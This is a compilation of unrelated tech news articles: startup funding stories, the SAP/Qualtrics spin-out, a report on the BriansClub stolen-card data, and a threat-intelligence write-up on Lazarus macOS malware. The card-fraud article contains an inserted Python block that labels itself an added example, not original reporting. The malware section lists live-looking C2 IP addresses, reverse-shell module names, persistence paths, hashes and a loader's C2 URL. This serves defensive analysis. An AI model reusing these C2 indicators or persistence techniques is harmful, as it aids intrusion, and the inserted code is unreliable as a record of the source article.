Hevo draws in $8 million Series A for its no-code data pipeline service

Hevo founders Manish Jethani and Sourabh Agarwal.

According to data pipeline startup Hevo, many small to medium-sized companies juggle more than 40 different applications to manage sales, marketing, finance, customer support and other operations. All of these applications are important sources of data that can be analyzed to improve a company’s performance. That data often remains separate, however, making it difficult for different teams to collaborate.

Hevo enables its clients’ employees to integrate data from more than 150 different sources, including enterprise software from Salesforce and Oracle, even if they don’t have any technical experience. The company announced today that it has raised an $8 million Series A round led by Singapore-based venture capital firm Qualgro and Lachy Groom, a former executive at payments company Stripe.

The round, which brings Hevo’s total raised so far to $12 million, also included participation from returning investors Chiratae Ventures and Sequoia Capital India’s early-stage startup program Surge. The company was first covered by TechCrunch when it raised seed funding in 2017.

Hevo’s Series A will be used to increase the number of integrations available on its platform, and hire sales and marketing teams in more countries, including the United States and Singapore. The company currently has clients in 16 markets, including the U.S., India, France, Australia and Hong Kong, and counts payments company Marqeta among its customers.

In a statement, Puneet Bysani, tech lead manager at Marqeta, said, “Hevo saved us many engineering hours, and our data teams could focus on creating meaningful KPIs that add value to Marqeta’s business. With Hevo’s pre-built connectors, we were able to get data from many sources into Redshift and Snowflake very quickly.”

Based in Bangalore and San Francisco, Hevo was founded in 2017 by chief executive officer Manish Jethani and chief technology officer Sourabh Agarwal. The two previously launched SpoonJoy, a food delivery startup that was acquired by Grofers, one of India’s largest online grocery delivery services, in 2015. Jethani and Agarwal spent a year working at Grofers before leaving to start Hevo.

Hevo originated in the challenges Jethani and Agarwal faced while developing tech for SpoonJoy’s order and delivery system.

“All of our team members would come to us and say, ‘hey, we want to look at these metrics,’ or we would ask our teams questions if something wasn’t working. Oftentimes, they would not have the data available to answer those questions,” Jethani told TechCrunch.

Then at Grofers, Jethani and Agarwal realized that even large companies face the same challenges. They decided to work on a solution to allow companies to quickly integrate data sources.

For example, a marketing team at an e-commerce company might have data about its advertising on social media platforms, and how much traffic campaigns bring to their website or app. But they might not have access to data about how many of those visitors actually make purchases, or if they become repeat customers. By building a data pipeline with Hevo, they can bring all that information together.

Hevo is designed to serve all sectors, including e-commerce, healthcare and finance. In order to use it, companies sign up for Hevo’s services on its website and employees enter their credentials for software supported by the platform. Then Hevo automatically extracts and organizes the data from those sources and prepares it for cloud-based data warehouses, such as Amazon Redshift and Snowflake. A user dashboard allows companies to customize integrations or hide sensitive data.

Hevo is among several “no code, low code” startups that have recently raised venture capital funding for building tools that enable non-developers to add features to their existing software. The founders say its most direct competitor is Fivetran, an Oakland, California-based company that also builds pipelines to move data to warehouses and prepare it for analysis.

Jethani said Hevo differentiates by “optimizing our product for non-technical users.”

“The number of companies who need to use data is very high and there is not enough talent available in the market. Even if it is available, it is very competitive and expensive to hire that engineering talent because big companies like Google and Amazon are also competing for the same talent,” he added. “So we felt that there has to be some democratization of who can use this technology.”

Hevo also focuses on integrating data in real time, which is especially important for companies that provide on-demand deliveries or services. During the COVID-19 pandemic, Jethani says e-commerce clients have used Hevo to manage an influx in orders as people under stay-at-home orders purchase more items online. Companies are also relying on Hevo to help organize and manage data as their employees continue to work remotely.

In a statement about the funding, Qualgro managing partner Heang Chhor said, “Hevo provides a truly innovative solution for extracting and transforming data across multiple data sources — in real time with full automation. This helps enterprises to fully capture the benefit of data flowing through the many databases and software they currently use. Hevo’s founders are the type of globally-minded entrepreneurs that we like to support.”

Hearsay, maker of compliant tools for financial services, deepens ties with Salesforce

Financial services companies like banks and insurers tend to be heavily regulated. As such, they require a special level of security and auditability. Hearsay, which makes compliant communications tools for these types of companies, announced a new partnership with Salesforce today, enabling smooth integration with Salesforce CRM and marketing automation tools.

The company also announced that Salesforce would be taking a minority stake in Hearsay, although company co-founder and CEO Clara Shih did not provide any details on that part of the announcement.

Shih says the company created the social selling category when it launched 10 years ago. Today, it provides a set of tools like email, messaging and websites along with a governance layer to help financial services companies interact with customers in a compliant way. Their customers are primarily in banking, insurance, wealth management and mortgages.

She said that they realized if they could find a way to share the data they were collecting with the Hearsay tool set with CRM and marketing automation software in an automated way, it would make greater use of this information than it could on its own. To that end, they have created a set of APIs to enable that with some built-in connectors. The first one will be to connect Hearsay to Salesforce, with plans to add other vendors in the future.

“It’s about being able to connect [data from Hearsay] with the CRM system of record, and then analyzing it across thousands, if not tens of thousands of advisors or bankers in a single company, to uncover best practices. You could then use that information like GPS driving directions that help every advisor behave in the moment and reach out in the moment like the very best advisor would,” Shih explained.

In practice, this means sharing the information with the customer data platform (CDP), the CRM and marketing automation tooling to deliver more intelligent targeting based on a richer body of information. So the advisor can use information gleaned from everything he or she knows about the client across the set of tools to deliver a more meaningful personal message instead of a targeted ad or an email blast. As Shih points out, the ad might even make sense, but could be tone deaf depending on the circumstances.

“What we focus on is this human-client experience, and that can only be delivered in the last mile because it’s only with the advisor that many clients will confide in these very important life events and life decisions, and then conversely, it’s only in the last mile that the trusted advisor can deliver relationship advice,” she said.

She says what they are trying to do by combining streams of data about the customer is build loyalty in a way that pure technology solutions just aren’t capable of doing. As she says, nobody says they are switching banks because it has the best chat bot.

Hearsay was founded in 2009 and has raised $51 million, as well as whatever other money Salesforce will be adding to the mix with today’s investment. Other investors include Sequoia and NEA Associates. Its last raise was way back in 2013, a $30 million Series C.

Here’s Why Credit Card Fraud is Still a Thing

Most of the civilized world years ago shifted to requiring computer chips in payment cards that make it far more expensive and difficult for thieves to clone and use them for fraud. One notable exception is the United States, which is still lurching toward this goal. Here’s a look at the havoc that lag has wrought, as seen through the purchasing patterns at one of the underground’s biggest stolen card shops that was hacked last year.

In October 2019, someone hacked BriansClub, a popular stolen card bazaar that uses this author’s likeness and name in its marketing. Whoever compromised the shop siphoned data on millions of card accounts that were acquired over four years through various illicit means from legitimate, hacked businesses around the globe — but mostly from U.S. merchants. That database was leaked to KrebsOnSecurity, which in turn shared it with multiple sources that help fight payment card fraud.

An ad for BriansClub has been using my name and likeness for years to peddle millions of stolen credit cards.

Among the recipients was Damon McCoy, an associate professor at New York University’s Tandon School of Engineering [full disclosure: NYU has been a longtime advertiser on this blog]. McCoy’s work in probing the credit card systems used by some of the world’s biggest purveyors of junk email greatly enriched the data that informed my 2014 book Spam Nation, and I wanted to make sure he and his colleagues had a crack at the BriansClub data as well.

McCoy and fellow NYU researchers found BriansClub earned close to $104 million in gross revenue from 2015 to early 2019, and listed over 19 million unique card numbers for sale. Around 97% of the inventory was stolen magnetic stripe data, commonly used to produce counterfeit cards for in-person payments.

“What surprised me most was there are still a lot of people swiping their cards for transactions here,” McCoy said.

In 2015, the major credit card associations instituted new rules that made it riskier and potentially more expensive for U.S. merchants to continue allowing customers to swipe the stripe instead of dip the chip. Complicating this transition was the fact that many card-issuing U.S. banks took years to replace their customer card stocks with chip-enabled cards, and countless retailers dragged their feet in updating their payment terminals to accept chip-based cards.

Indeed, three years later the U.S. Federal Reserve estimated (PDF) that 43.3 percent of in-person card payments were still being processed by reading the magnetic stripe instead of the chip. This might not have been such a big deal if payment terminals at many of those merchants weren’t also compromised with malicious software that copied the data when customers swiped their cards.

Following the 2015 liability shift, more than 84 percent of the non-chip cards advertised by BriansClub were sold, versus just 35 percent of chip-based cards during the same time period.

“All cards without a chip were in much higher demand,” McCoy said.

Perhaps surprisingly, McCoy and his fellow NYU researchers found BriansClub customers purchased only 40% of its overall inventory. But what they did buy supports the notion that crooks generally gravitate toward cards issued by financial institutions that are perceived as having fewer or more lax protections against fraud.

Source: NYU.

While the top 10 largest card issuers in the United States accounted for nearly half of the accounts put up for sale at BriansClub, only 32 percent of those accounts were sold — and at roughly half the median price of those issued by small- and medium-sized institutions.

In contrast, more than half of the stolen cards issued by small and medium-sized institutions were purchased from the fraud shop. This was true even though by the end of 2018, 91 percent of cards for sale from medium-sized institutions were chip-based, and 89 percent from smaller banks and credit unions. Nearly all cards issued by the top ten largest U.S. card issuers (98 percent) were chip-enabled by that time.

REGION LOCK

The researchers found BriansClub customers strongly preferred cards issued by financial institutions in specific regions of the United States, specifically Colorado, Nevada, and South Carolina.

“For whatever reason, those regions were perceived as having lower anti-fraud systems or those that were not as effective,” McCoy said.

Cards compromised from merchants in South Carolina were in especially high demand, with fraudsters willing to spend twice as much per capita on those cards as on cards from any other state — roughly $1 per resident.

That sales trend also was reflected in the support tickets filed by BriansClub customers, who frequently were informed that cards tied to the southeastern United States were less likely to be restricted for use outside of the region.

Image: NYU.

McCoy said the lack of region locking also made stolen cards issued by banks in China something of a hot commodity, even though these cards demanded much higher prices (often more than $100 per account): The NYU researchers found virtually all available Chinese cards were sold soon after they were put up for sale. Ditto for the relatively few corporate and business cards for sale.

A lack of region locks may also have caused card thieves to gravitate toward buying up as many cards as they could from USAA, a savings bank that caters to active and former military service members and their immediate families. More than 83 percent of the available USAA cards were sold between 2015 and 2019, the researchers found.

Although Visa cards made up more than half of accounts put up for sale (12.1 million), just 36 percent were sold. MasterCards were the second most-plentiful (3.72 million), and yet more than 54 percent of them sold.

American Express and Discover, which unlike Visa and MasterCard are so-called “closed loop” networks that do not rely on third-party financial institutions to issue cards and manage fraud on them, saw 28.8 percent and 33 percent of their stolen cards purchased, respectively.

PREPAIDS

Some people concerned about the scourge of debit and credit card fraud opt to purchase prepaid cards, which generally enjoy the same cardholder protections against fraudulent transactions. But the NYU team found compromised prepaid accounts were purchased at a far higher rate than regular debit and credit cards.

Several factors may be at play here. For starters, relatively few prepaid cards for sale were chip-based. McCoy said there was some data to suggest many of these prepaids were issued to people collecting government benefits such as unemployment and food assistance. Specifically, the “service code” information associated with these prepaid cards indicated that many were restricted for use at places like liquor stores and casinos.

“This was a pretty sad finding, because if you don’t have a bank this is probably how you get your wages,” McCoy said. “These cards were disproportionately targeted. The unfortunate and striking thing was the sheer demand and lack of [chip] support for prepaid cards. Also, these cards were likely more attractive to fraudsters because [the issuer’s] anti-fraud countermeasures weren’t up to par, possibly because they know less about their customers and their typical purchase history.”
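The service-code field the researchers relied on is the three-digit value from the card’s magnetic stripe (ISO/IEC 7813): the first digit says whether the card carries a chip, the third what it may be used for. The following added example (not code from the NYU paper or from this site) shows how an issuer triaging a leaked dump might decode that field and compute sell-through per category, as the NYU analysis did; the records are constructed sample data, and the issuer-tier labels are assumptions.

```python
"""Classify leaked card records by magnetic-stripe service code (ISO/IEC 7813).

Added example for issuer-side triage of a leaked card-shop dump: it decodes
the three-digit service code to tell chip-capable from stripe-only cards and
to surface the usage restrictions the code carries, then computes sell-through
per category the way the NYU analysis grouped the BriansClub accounts.
SAMPLE_RECORDS below are constructed, not rows from the real dump.
"""
from collections import defaultdict
from dataclasses import dataclass

# ISO/IEC 7813 service code: digit 1 = interchange/technology, digit 2 =
# authorization processing, digit 3 = permitted services and PIN rules.
INTERCHANGE = {
    "1": "international",
    "2": "international, chip (IC) where feasible",
    "5": "national only",
    "6": "national only, chip (IC) where feasible",
    "7": "private/bilateral only",
    "9": "test",
}
AUTHORIZATION = {
    "0": "normal",
    "2": "online authorization required",
    "4": "online authorization required except by bilateral agreement",
}
SERVICES = {
    "0": "no restrictions, PIN required",
    "1": "no restrictions",
    "2": "goods and services only",
    "3": "ATM only, PIN required",
    "4": "cash only",
    "5": "goods and services only, PIN required",
    "6": "no restrictions, PIN where feasible",
    "7": "goods and services only, PIN where feasible",
}


@dataclass(frozen=True)
class ServiceCode:
    interchange: str
    authorization: str
    services: str
    chip_capable: bool   # card was issued with an EMV chip
    goods_only: bool     # no cash access (ATM / cash-back) permitted


def decode_service_code(code: str) -> ServiceCode:
    """Decode a 3-digit service code; raises ValueError on malformed input."""
    if len(code) != 3 or not code.isdigit():
        raise ValueError(f"service code must be three digits, got {code!r}")
    d1, d2, d3 = code
    if d1 not in INTERCHANGE or d2 not in AUTHORIZATION or d3 not in SERVICES:
        raise ValueError(f"unassigned service code {code!r}")
    return ServiceCode(
        interchange=INTERCHANGE[d1],
        authorization=AUTHORIZATION[d2],
        services=SERVICES[d3],
        chip_capable=d1 in ("2", "6"),       # 2xx / 6xx = chip present
        goods_only=d3 in ("2", "5", "7"),    # xx2 / xx5 / xx7 = no cash
    )


# Constructed sample records: (issuer tier, card type, service code, sold?).
# Tier labels ("top10" / "small") are assumed fields, not from the dump.
SAMPLE_RECORDS = [
    ("top10", "credit", "201", True),
    ("top10", "credit", "201", False),
    ("top10", "credit", "101", False),
    ("small", "credit", "201", True),
    ("small", "debit", "101", True),
    ("small", "prepaid", "101", True),
    ("small", "prepaid", "121", True),
    ("small", "prepaid", "107", True),
    ("small", "prepaid", "201", False),
    ("top10", "prepaid", "101", True),
]


def sell_through(records, key):
    """Return {group: (sold, listed, fraction)} with groups chosen by key()."""
    listed = defaultdict(int)
    sold = defaultdict(int)
    for rec in records:
        group = key(rec)
        listed[group] += 1
        if rec[3]:
            sold[group] += 1
    return {g: (sold[g], listed[g], sold[g] / listed[g]) for g in listed}


def by_chip(records):
    """Sell-through split into chip-capable vs. stripe-only cards."""
    return sell_through(
        records,
        lambda r: "chip" if decode_service_code(r[2]).chip_capable else "stripe-only",
    )


def by_card_type(records):
    """Sell-through split by credit / debit / prepaid."""
    return sell_through(records, lambda r: r[1])


if __name__ == "__main__":
    for name, table in (("chip", by_chip(SAMPLE_RECORDS)), ("type", by_card_type(SAMPLE_RECORDS))):
        for group, (s, n, frac) in sorted(table.items()):
            print(f"{name:5} {group:12} {s}/{n} sold ({frac:.0%})")
```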

PROFITS

The NYU researchers estimate BriansClub pulled in approximately $24 million in profit over four years. They calculated this number by taking the more than $100 million in total sales and subtracting commissions paid to card thieves who supplied the shop with fresh goods, as well as the price of cards that were refunded to buyers. BriansClub, like many other stolen card shops, offers refunds on certain purchases if the buyer can demonstrate the cards were no longer active at the time of purchase.

On average, BriansClub paid suppliers commissions ranging from 50-60 percent of the total value of the cards sold. Card-not-present (CNP) accounts — or those stolen from online retailers and purchased by fraudsters principally for use in defrauding other online merchants — fetched a much steeper supplier commission of 80 percent, but mainly because these cards were in such high demand and low supply.

The NYU team found card-not-present sales accounted for just 7 percent of all revenue, even though card thieves clearly now have much higher incentives to target online merchants.

A story here last year observed that this exact supply and demand tug-of-war had helped to significantly increase prices for card-not-present accounts across multiple stolen credit card shops in the underground. Not long ago, the price of CNP accounts was less than half that of card-present accounts. These days, those prices are roughly equivalent.

One likely reason for that shift is that the United States is the last of the G20 nations to fully transition to more secure chip-based payment cards. Every other country that long ago made the chip card transition saw the same dynamic: as counterfeiting physical cards became harder, the fraud didn’t go away but instead shifted to online merchants.

The same progression is happening now in the United States, only the demand for stolen CNP data still far outstrips supply. Which might explain why we’ve seen such a huge uptick over the past few years in e-commerce sites getting hacked.

“Everyone points to this displacement effect from card-present to card-not-present fraud,” McCoy said. “But if the supply isn’t there, there’s only so much room for that displacement to occur.”

No doubt the epidemic of card fraud has benefited mightily from hacked retail chains — particularly restaurants — that still allow customers to swipe chip-based cards. But as we’ll see in a post to be published tomorrow, new research suggests thieves are starting to deploy ingenious methods for converting card data from certain compromised chip-based transactions into physical counterfeit cards.

A copy of the NYU research paper is available here (PDF).

ComplyAdvantage nabs $50M for an AI platform and database to detect and stop financial crime

The growth of digital banking has opened up a wealth of opportunities for making the world of finance more accessible and transparent to a greater number of people. But the darker underbelly is that it has also created more avenues for illicit activity to flourish, with some $2 trillion laundered annually but only 1-3% of that sum “caught.”

To help combat that, a London-based startup called ComplyAdvantage, which has built an AI platform and wider database of some 10 million entities to help identify and track those involved in financial crime, is today announcing a growth round of funding of $50 million to expand its reach and operations.

Specifically, the plan will be to use the funding for hiring, to invest in the tools it uses to detect entities and map the relationships between them and to bring on more clients.

“We’ve been focused on more granular analysis and being able to scale to hundreds of millions of searches across our database,” Charles Delingpole, founder and CEO, said in an interview. “The next phase is more around the network of contacts and more enhanced diligence.” The company today has some 250 staff, mainly in the U.K. and Romania.

The Series C is being led by Ontario Teachers’ Pension Plan Board (Ontario Teachers’), a huge pension plan out of Canada (U.S. $155 billion) that is known as a prolific growth-stage tech investor. Previous backers Balderton and Index are also in the round. The company has raised $88 million to date, and while it’s not disclosing its valuation, for some context, it was last valued at around $141 million in its last round a year ago, per PitchBook data.

Today, ComplyAdvantage has more than 500 customers, primarily financial institutions using it to meet regulatory compliance requirements as well as to reduce their own exposure and risk, providing some automated services to complement (and potentially replace) some of the manual checks that they make to prove you are who you say you are.

It also has a growing business with other groups that are tracking fraud for their own ends, such as insurance companies trying to stem fraudulent claims and government entities. It also has a number of partners that access its database and use that as part of their own solutions (Quantexa, which announced a big funding round of its own last week, is one of those licensing partners).

“A lot of companies in the wider identity space are powered by our data, even if they don’t disclose it,” Delingpole said.

The company had its start originally focusing on the process of helping banks meet regulatory compliance around fraud detection by ingesting and analysing documents provided by customers ahead of opening accounts, initiating larger transactions with new entities and so on. That has taken on a more targeted purpose in recent years as ComplyAdvantage’s database has grown deeper.

Today the core of the business is based around a central database of known money launderers, human traffickers, terrorists, drug lords and others who exploit financial rails to run illegal operations and make a profit from them.

It’s formed, Delingpole said, by way of “automatically ingesting tens of thousands of data points, from websites, national warning lists, linked real-time databases of companies and various other applications on top of that.” That central database is still growing, and Delingpole believes that it’s not unrealistic for it to run to a much higher number in order to get the most accurate picture possible.

“Although we have 10 million today, we want to cover every company and person one day. We think the right number is 8 billion” — that is, the world’s population. “With that larger database we can solve other kinds of crimes too.”

The startup already has a straight channel through to government agencies, reporting connections and discoveries on behalf of their clients directly to them. And to be clear, although there are now strong data protection measures in place in Europe, when people are linked to illegal activity, that puts them on a list that supersedes that. When someone is suspected and is tipped to authorities, that information is kept private.

While all institutions will continue to have teams of people dedicated to risk analysis and investigations into activity, the idea here is to supercharge that work with more data that helps those investigators tackle the greater scale of data in the world today.

“Detecting financial crime in billions of transactions that take place around the globe has become nearly impossible without the application of data science and machine learning. It is this approach that has made ComplyAdvantage into a leader in the category, and the go-to partner for organizations that seek to automate what are still very often manual or inadequate processes,” said Jan Hammer, a partner at Index Ventures, in a statement.

The longer-term opportunity is to build out ComplyAdvantage’s customer base by leveraging information that the company is already surfacing that might be relevant to other verticals.

Insurance is a key example, Delingpole said. “We already see a mention of a person having defaulted on a loan then making an insurance claim,” he said. “We see credit, fraud and ownership data together.”

This, of course, puts the company into close competition not just with others building credit databases but those building strong AI platforms to leverage data to gain deeper insights into seemingly disparate digital actions and to build better pictures of activity on behalf of their clients. That includes not just partners like Quantexa, but others like Palantir.

The strength here, said Delingpole, is the sheer size of ComplyAdvantage’s database and its very specific focus on financial crime and how that sits for companies that need to police that, both for their own business health and for regulatory reasons. It’s that focus that has attracted investment.

“ComplyAdvantage offers mission-critical technology solutions for combating financial crime and keeping pace with an ever-evolving regulatory landscape,” said Olivia Steedman, senior managing director, TIP, at Ontario Teachers’. “The company is well-positioned to continue its rapid growth as its powerful technology platform transforms the compliance and risk management process for its clients.”

Explorium reels in $31M Series B as data discovery platform grows

In a world with growing amounts of data, finding the right set for a particular machine learning model can be a challenge. Explorium has created a platform to make that an easier task, and today the startup announced a $31 million Series B.

The round was led by Zeev Ventures, with help from Dynamic Loop, Emerge, 01 Advisors and F2 Capital. Today’s investment brings the total raised to $50 million, according to the company.

CEO and co-founder Maor Shlomo says the company’s platform is designed to help people find the right data for their model. “The next frontier in analytics will not be about how you fine tune or improve a certain algorithm, it will be how do you find the right data to fit into those algorithms to make them as useful and impactful as possible,” he said.

He says that companies need this more than ever during the pandemic because this can help customers find more relevant data at a time when their historical data might not be useful to help build predictive models. For instance, if you’re a retailer, your historical shopping data won’t be relevant if you are in an area where you can no longer open your store, he says.

“There are so many environmental factors that are now influencing every business problem that organizations are trying to solve that Explorium is becoming this […] layer where you search for data to solve your business problems to fuel your predictive models,” he said.

When the pandemic hit in March, he worried about how it would affect his company, and he put a hold on hiring, but as he saw business increasing in April and May, he decided to accelerate again. The company currently has 87 employees between offices in Israel and the United States and he plans to be at 100 in the next couple of months.

When it comes to hiring, he says he doesn’t try to have hard and fast hiring rules like you have a certain degree or have gone to a certain school. “The only thing that’s important is getting good people hungry to succeed. The more diverse the culture is, the more diverse the group is, we find the more fun it is for people to discover each other and to discover different cultures,” Shlomo explained.

In terms of fundraising, while the company needs money to fuel its growth, at the same time it still had plenty of money in the bank from last year’s round. “We got into the pandemic and we didn’t know how long it’s going to last, and [early on] we didn’t yet know how it would impact the business. Existing investors were always bullish about the company. We decided to just go with that,” he said.

The company was founded in 2017 and previously raised a $19.1 million Series A round last year.

YC alum Paragon snags $2.5M seed for low-code app integration platform

Low-code is a hot category these days. It helps companies build workflows or simple applications without coding skills, freeing up valuable engineering resources for more important projects. Paragon, a member of the Y Combinator Winter 2020 cohort, announced a $2.5 million seed round today for its low-code application integration platform.

Investors include Y Combinator, Village Global, Global Founders Capital, Soma Capital and FundersClub.

“Paragon makes it easier for non-technical people to be able to build out integrations using our visual workflow editor. We essentially provide building blocks for things like API requests, interactions with third party APIs and conditional logic. And so users can drag and drop these building blocks to create workflows that describe business logic in their application,” says company co-founder Brandon Foo.

Foo acknowledges there are a lot of low-code workflow tools out there, but many like UIPath, Blue Prism and Automation Anywhere concentrate on Robotic Process Automation (RPA) to automate certain tasks. He says he and co-founder Ishmael Samuel wanted to focus on developers.

“We’re really focused on how can we improve developer efficiency, and how can we bring the benefits of low code to product and engineering teams and make it easier to build products without writing manual code for every single integration, and really be able to streamline the product development process,” Foo told TechCrunch.

The way it works is you can drag and drop one of 1200 predefined connectors for tools like Stripe, Slack and Google Drive into a workflow template, and build connectors very quickly to trigger some sort of action. The company is built on AWS serverless architecture, so you define the trigger action and subsequent actions, and Paragon handles all of the back-end infrastructure requirements for you.

It’s early days for the company. After launching in private beta in January, the company has 80 customers. It currently has 6 employees, including Foo, who previously co-founded Polymail, and Samuel, who was previously lead engineer at Uber. They plan to hire 4 more employees this year.

With both founders people of color, they definitely are looking to build a diverse team around them. “I think it’s already sort of built into our DNA. As a diverse founding team we have perhaps a broader viewpoint and perspective in terms of hiring the kind of people that we seek to work with. Of course, I think there’s always room for improvements, and so we’re always looking for new ways that we can be more inclusive in our hiring recruiting process [as we grow],” he said.

As far as raising during a pandemic, he says it’s been a crazy time, but he believes they are solving a real problem and that they can succeed in spite of the macro economic conditions of the moment.

SAP decision to spin out Qualtrics 20 months after spending $8B surprises industry watchers

When SAP announced it was spinning out Qualtrics on Sunday, a company it bought less than two years ago for an eye-popping $8 billion, it was enough to make your head spin. At the time, then CEO Bill McDermott saw it as a way to bridge the company’s core operational data with customer data, while acquiring a cloud company that could help generate recurring revenue for the ERP giant, and maybe give it a dose of innovation along the way.

But Sunday night the company announced it was spinning out the acquisition, giving its $8 billion baby independence, and essentially handing the company back to founder Ryan Smith, who will become the largest individual shareholder when this is all over.

It’s not every day you see founders pull in a windfall like $8 billion, get sucked into the belly of the large corporate beast and come out the other side just 20 months later with the cash, independence and the CEO as the largest individual stockholder.

While SAP will own a majority of the stock, much like Dell owns a majority of VMware, the company will operate independently and have its own board. It can acquire other firms and make decisions separately from SAP.

We spoke to a few industry analysts to find out what they think about all this, and while the reasoning behind the move involves a lot of complex pieces, it could be as simple as the deal was done under the previous CEO, and the new one was ready to move on from it.

Bold step

It’s certainly unusual for a company like SAP to spend this kind of money, and then turn around so quickly and spin it off. In fact, Brent Leary, principal analyst at CRM Essentials, says that this was a move he didn’t see coming, and it could be related to that fat purchase price. “To me it could mean that SAP didn’t see the synergies of the acquisition panning out as they had envisioned and are looking to recoup some of their investment,” Leary told TechCrunch.

Holger Mueller, an analyst with Constellation Research, agreed with Leary’s assessment, but doesn’t think that means the deal failed. “SAP doesn’t lose anything in regards to their […] data and experience vision, as they still retain [controlling interest in Qualtrics]. It also opens the opportunity for Qualtrics to partner with other ERP vendors [and broaden its overall market],” he said.

Jeanne Bliss, founder and president at CustomerBLISS, a company that helps clients deliver better customer experiences, sees this as a positive step forward for Qualtrics. “This spin off enables Qualtrics to focus on its core business and prove its ability to provide essential technology executives are searching for to enable speed of decision making, innovation and customization,” she said.

Show me the money

Patrick Moorhead, founder and principal analyst at Moor Insight & Strategy sees the two companies moving towards a VMware/Dell model where SAP removes the direct link between them, which could then make them more attractive to a broader range of customers than perhaps they would have been as part of the SAP family. “The big play here is all financial. With tech stocks up so high, SAP isn’t seeing the value in its stock. I am expecting a VMware kind of alignment with a strategic collaboration agreement,” he said.

Ultimately though, he says the move reflects a cultural failure on the part of SAP. It simply couldn’t find a way to co-exist with a younger, more nimble company like Qualtrics. “I believe SAP spinning out Qualtrics is a sign that its close connection to create symbiotic value has failed. The original charter was to bring it in to modernize SAP but apparently the “not invented here” attitudes kicked in and doomed integration,” Moorhead said.

That symbiotic connection would have involved McDermott’s vision of combining operational and customer data, but Leary also suggested that since the deal happened under the previous CEO, perhaps new CEO Christian Klein wants to start with a clean slate and this simply wasn’t his deal.

Qualtrics for the win

In the end, Qualtrics got all that money, gets to IPO after all, and returns to being an independent company selling to a larger potential customer base. All of the analysts we spoke to agreed the news is a win for Qualtrics itself.

Leary says the motivation for the original deal was to give SAP a company that could sell beyond its existing customer base. “It seems like that was the impetus for the acquisition, and the fact that SAP is spinning it off as an IPO 20 months after acquiring Qualtrics gives me the impression that things didn’t come together as expected,” he said.

Mueller also sees nothing but positives for Qualtrics. “It’s a win […] for Qualtrics, which can now deliver what they wanted [from the start], and it’s a win for customers as Qualtrics can run as fast as they want,” he said.

Regardless, the company moves on, and the Qualtrics IPO moves forward, and it’s almost as though Qualtrics gets a do-over with $8 billion in its pocket for its trouble.

Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform

At the beginning of the year, Kaspersky reported new details of an ongoing campaign they called ‘AppleJeus’, attributed to North Korean-backed APT group Lazarus and first spotted in 2018. Kaspersky noted that as of January 2020, the Lazarus group was “currently one of the most active and prolific APT actors”. Since January, other reports have detailed a macOS RAT (DaclsRAT) and linked it to a wider Lazarus cross-platform toolset (MATA framework). Since late May 2020, we have observed three other distinct families of macOS malware likely from the same actors, most of which have not yet been publicly documented. In this post, we provide a high-level overview of all four of these macOS malware families and detail their variants and evolution so far.

1. Trojanized One-Time Password Apps

The first of these four families has been covered by other researchers in detail; here we will just summarize the main findings for completeness.

First seen on 8th April on VirusTotal, the so-called DaclsRAT malware was distributed as a trojanized “One-time-password” (OTP) app called TinkaOTP. The malware embeds a copy of the open-source MinaOTP project as cover for its malicious activities.

Written in Swift, the initial observed sample was built on a macOS 10.15.3 (19D76) machine, while a second version, compiled the following week on April 1st was built on 10.15.4 (19E266), indicating if nothing else that the malware authors were vigilant at keeping up with macOS updates on their own machines, whether virtual or metal-based.

As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the user’s Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist.

The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary:

The .mina Mach-O payload itself contains a number of interesting UTF-16 strings that indicate both its purpose and its C2s:

67.43.239.146:443
185.62.58.207:443
plugin_file
plugin_process
/bin/bash
plugin_reverse_p2p
logsend
plugin_socks

The payload’s main() function is fairly succinct and hardcodes both the paths and contents for a LaunchAgent and LaunchDaemon to achieve persistence:

In an update last week, researchers suggested that the malware contained in the trojanized OTP app was in fact part of a larger toolkit they named ‘MATA’. Since extensive details of this have already been published, we refer interested readers to the earlier work.

2. New Trojanized CryptoTrading Apps

The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings.

Trojanizing cryptocurrency-related apps is where the AppleJeus story began in 2018, and it seems the group must have met with reasonable success as 2020 has seen at least two new attempts, with CoinGoTrade and Cryptoistic.

We were first alerted to CoinGoTrade via a tweet on June 3rd from researcher @ccxsaber. A domain at coingotrade.com was set up to lure victims into downloading a fake cryptocurrency app. Although we were not able to source the app bundle, further investigation on VirusTotal revealed two samples of a malicious Mach-O binary that appear to have been the loader:

326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd
4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da

These two samples are both written in Objective-C rather than Swift, and appear identical save for a single line in the main() function, as shown by the following diff:

diff -y <(otool -tv 326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd) 
0000000100001adc	movl $0x4c4b40, %edi | 0000000100001adc  movl $0x1, %edi

The hardcoded value of 0x4c4b40 is the number of microseconds passed to the usleep function and equates to 5 seconds (5000000 microseconds). Given that there are no other changes in the code between the two samples, it can be supposed that the second sample, which appeared on VirusTotal 14 days after the first, may have been released as a correction to the first. The cslp() function also causes the code to pause execution for short intervals, so it may be that the authors decided the call to usleep was redundant or was somehow not producing the results they desired.

The samples embed calls to the following URL:

https://coingotrade.com/update_coingotrade.php

and post the following data to the server:

Unfortunately, we were not able to retrieve a sample of the payload executed out of /private/tmp/updatecoingotrade. However, clues to its likely behaviour may perhaps be found in a second trojanized cryptotrading app appearing on VirusTotal in early May 2020, called “Cryptoistic”.

Unlike the CoinGoTrade trojan, Cryptoistic is written in Swift, although it contains a great deal of code bridged to Objective-C, perhaps indicating a developer more familiar with the older programming language. Cryptoistic was compiled on April 2nd, a day after the second version of TinkaOTP, but on a Mac device (real or virtual machine) running an older version of macOS than the one used for compiling the trojanized OTP apps: in this case, 10.15.2 (19C57).

Apple’s 19C57 release build had already been superseded several months earlier at the end of January, so at least here the threat actor’s build machine was not being kept up to date.

